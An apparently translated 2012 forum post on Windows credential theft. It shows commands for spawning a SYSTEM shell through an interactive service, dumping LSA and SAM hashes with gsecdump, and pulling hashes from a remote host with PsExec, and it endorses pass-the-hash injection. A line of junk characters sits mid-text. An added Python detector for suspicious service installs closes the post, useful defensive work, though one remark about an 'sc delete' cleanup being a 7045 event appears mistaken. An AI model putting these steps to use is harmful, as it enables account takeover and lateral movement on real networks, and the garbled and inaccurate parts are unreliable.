Hash Injection Attack

Posted on 2012-11-6 21:09:29
To get a DOS prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD
  Y0 h- v* l# P' I% ~: E- a6 {! t. C3 Y% y
Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LM hashes that can be easily broken with Rainbow Tables.
A tip: you can use the iam tool from the pshtools toolkit to import the hash information just captured with gsecdump into the local lsass process, which achieves the hash injection attack. The foreigners really are good at this; administrators are going to be busy now. The LM/NT hashes obtained during ARP spoofing, or the ones obtained with gethash, actually don't need to be cracked at all; this is just using the tool. As the original article puts it, no matter whether the password is 4 characters or 127 characters long, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing; what a gap.
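On the defending side, the steps above leave a clear trace: a service installation whose binary is a command interpreter, an interactive service type, or the PsExec service. The following is an added example (not from the post or the truesec article) that flags such records; it assumes Windows System-log Event ID 7045 service-install records, flattened here into constructed key=value lines, and it does not reflect the exact field names of the real event message.

```python
"""Flag service installations that look like the SYSTEM-shell / PsExec pattern above.

Added example, not code from the original post. Assumption: each input line is a
flattened Windows System-log Event 7045 record ("A service was installed in the
system") written as "; "-separated key=value pairs. The sample lines are constructed.
"""
import re

# Constructed sample records (not real logs); field names are an assumption.
SAMPLE_EVENTS = [
    r'EventID=7045; ServiceName=shellcmdline; ImagePath=C:\WINDOWS\system32\cmd.exe /K start; ServiceType=interactive process; StartType=demand start; Account=LocalSystem',
    r'EventID=7045; ServiceName=PSEXESVC; ImagePath=%SystemRoot%\PSEXESVC.exe; ServiceType=user mode service; StartType=demand start; Account=LocalSystem',
    r'EventID=7045; ServiceName=Spooler; ImagePath=%SystemRoot%\System32\spoolsv.exe; ServiceType=user mode service; StartType=auto start; Account=LocalSystem',
    r'EventID=7036; ServiceName=Spooler; State=running',
]

# A service whose binary is a shell or script host is almost never legitimate.
SHELL_BINARIES = re.compile(r'(?:^|\\)(cmd|powershell|pwsh|wscript|cscript)\.exe', re.IGNORECASE)


def parse_event(line):
    """Split a flattened record into a dict; parts without '=' are ignored."""
    fields = {}
    for part in line.split('; '):
        key, sep, value = part.partition('=')
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def service_install_findings(line):
    """Return the list of reasons a 7045 record is suspicious (empty if benign)."""
    ev = parse_event(line)
    if ev.get('EventID') != '7045':
        return []  # only service-install events are of interest here
    findings = []
    if SHELL_BINARIES.search(ev.get('ImagePath', '')):
        findings.append('shell interpreter as service binary')
    if 'interactive' in ev.get('ServiceType', '').lower():
        findings.append('interactive service type')  # the "type= interact" trick
    if ev.get('ServiceName', '').upper() == 'PSEXESVC':
        findings.append('PsExec service name')
    return findings


def scan(lines):
    """Map each flagged service name to its findings."""
    hits = {}
    for line in lines:
        findings = service_install_findings(line)
        if findings:
            hits[parse_event(line).get('ServiceName')] = findings
    return hits
```

Pairing a hit with the account that installed the service (the same record carries it) and with a later Event 7045 `sc delete` cleanup, as in the session above, makes the short-lived service stand out even more.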